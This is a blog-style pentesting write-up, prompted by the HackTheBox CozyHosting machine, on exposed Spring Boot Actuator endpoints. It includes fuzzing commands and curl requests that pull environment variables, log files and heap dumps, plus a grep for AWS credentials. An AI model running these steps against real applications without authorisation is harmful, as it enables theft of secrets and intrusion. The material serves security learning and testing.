Rachit Arora
SpringBoot Pentesting
Feb 27, 2024SpringBoot Pentesting
I was solving CozyHosting from HTB which had the initial foothold related to SpringBoot, so I’m gonna dive deeper like i always do
Vulnerable Spring application, if you want to test it out while reading the blog
This github repository is associated with the blog linked down below
Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators
What is Spring Boot?
Spring Boot is a powerful and versatile framework that simplifies the development of web applications. Its simplicity, versatility, and active community make it a popular choice among developers.
Spring ≠ Spring Boot
| Spring | Spring Boot |
|---|---|
| Spring is a popular Java-based framework used for building web applications. | Spring Boot is a framework built on top of Spring. |
| Spring provides a wide range of features and tools for building web applications | Spring Boot simplifies the development process by eliminating the need for developers to write boilerplate code. |
The story of Actuator.
Spring Boot includes a number of additional features called actuators to help monitor and control an application when it is pushed to production. Actuators allow controling and monitoring an application using either HTTP or JMX endpoints.
They can be quite helpful in debugging or monitoring a Spring application, but if you expose them too widely, things can get dangerous very quickly.
Spring provides a list of all actuators that are present by default and can be enabled.
The built-in endpoints will only be auto-configured when they are available. Most applications choose exposure via HTTP, where the ID of the endpoint along with a prefix of /actuator is mapped to a URL. For example, by default, the health endpoint is mapped to /actuator/health
Fuzzing Actuators
ffuf -w ~/Desktop/tools/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt -u http://10.10.11.224:55555/FUZZ
gobuster dir -w ~/wordlist/KaliLists/dirbuster/directory-list-2.3-medium.txt --url http://cozyhosting.htb/
Scanning pages simultaneously
$ cat domains.txt
domain.com
sub1.domain.com
sub2.domain.com
[... etc ...]
$ ffuf -w endpoints.txt:PATH -w domains.txt:DOMAIN -u http://DOMAIN/PATH
More about the way this could be automated and easier to understand is linked in the blog below.
Spring Actuator Security, Part 3: Finding Exposed Actuators using Dynamic Testing with ffuf
Finding Actuators ( Manually )
Spring Actuator Security, Part 2: Finding Actuators using Static Code Analysis with semgrep
Exploiting Actuators
Looking for Secrets
curl localhost:8081/actuator/env | jq .
// ... lots of stuff
"DB_CONN": {
"value": "psql://server/db",
"origin": "System Environment Property \"DB_CONN\""
},
// ... lots of stuff
Reading logs
curl localhost:8081/actuator/logfile
2022-08-24 13:45:14.813 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-08-24 13:45:14.814 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest
Dumping the dump ( Heapdump)
curl localhost:8081/actuator/heapdump -o heap.bin
This endpoint does exactly what it sounds like - it takes a copy of the Java heap (i.e., the memory of the application) and provides it to me as a large blob of binary data.
Now you can just use strings heap.bin | grep -C 20 AWS
This does not even touch the surface of SpringBoot exploitation, I have linked better and more indepth blog about this by pros.
More about Exploiting Actuators
Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators
Exploiting Spring Boot Actuators - Veracode
References
SPRING BOOT PENTESTING PART 1- FUNDAMENTALS
SPRING BOOT PENTESTING PART 2- ACTUATORS
Have any questions
Do you have any questions? Feel free to reach out to me on twitter or on LinkedIn.